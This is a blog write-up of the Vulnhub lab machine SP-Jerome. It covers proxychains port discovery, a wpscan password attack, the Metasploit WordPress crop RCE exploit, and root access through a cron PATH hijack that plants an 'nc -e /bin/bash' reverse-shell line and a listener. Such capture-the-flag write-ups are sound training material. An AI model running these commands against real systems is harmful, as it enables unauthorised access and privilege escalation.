mzfr@home:~$

HTB

Vulnhub

CTF

About

Donate

Vulnhub - SP-Jerome writeup


Jerome

Author: Daniel

Nmap

This is an insteresting machine. If we run the nmap scan on the IP we get only port 8080 open And if we visit that we’ll get an error.

To fix this we can use proxychains tool. Add the following line in the end of the proxychain config file i.e /etc/proxychains.conf

http MACHINE-IP 8080

And then rerun the nmap scan with the following command

proxychains -q nmap -sT -sV -p- 127.0.0.1

Now we can see that in reality there are two more port running the HTTP service.

HTTP

I got nothing on port 80

And on port 1337, I got nothing :)

So I decided to run dirsearch on port 1337 because 80 said to Move along

We can see there’s a wordpress website running.

Let’s run wpscan and see if we can find anything.

➜ wpscan --url http://127.0.0.1:1337/wordpress/ --wp-content-dir wp-content/ -e u --no-banner --proxy http://192.168.1.115:8080

Okay so there are two user root and jerome. I ran dictionary attack on jerome account and found the password in only 26s

➜ wpscan --url http://127.0.0.1:1337/wordpress/ --wp-content-dir wp-content/ --proxy http://192.168.1.115:8080 --no-banner -U jerome -P passwords.txt

jerome: jerome

I logged into wordpress dashboard but since there was no plugin or theme editor I knew I can’t get reverse shell from this.

So I decided to have a look at all the vulnerabilities we found from wpscan. Since we have authentication we can try to use them. The Only one that looked interesting was 2019-8942 the Authenticated Code Execution. I ran metasploit to exploit that .

use multi/http/wp_crop_rce

I ran the exploit with those options and got the reverse shell

From there I got to jerome home directory and found the user flag

b0ed001c825

Privilege escalation

Even before I could run the enumeration script I found that jerome is a sudoer because there was a .sudo_as_admin_successful in his home directory.

I spwan the TTY shell using

python3 -c 'import pty; pty.spawn("/bin/sh")'

and tried to run the sudo command but jerome: jerome didn’t work.

So I just ran the enumeration script and in cron I found a script

This script run with root privileges and we can exploit that easily.

How?

Well if you take a good look to the script you’ll see there are mutiple commands used like cd or ls without the exact path. We can make a file of those(cd or ls) name and put it in /home/jerome and wait for cron to execute it.

To do so, run the following commands:

$ echo "nc -e /bin/bash 192.168.1.107 5855" >> ls
$ chmod +x ls

And on your system run the listener i.e nc -nlvp 5855

And then wait for the cron to run the file and give you a root shell.

This was an easy machine but I got learn about the proxychains which is a new thing for me.

Thanks to @dsolstad for making this machine.

Thanks for reading, Feedback is always appreciated.

Follow me @0xmzfr for more “Writeups”.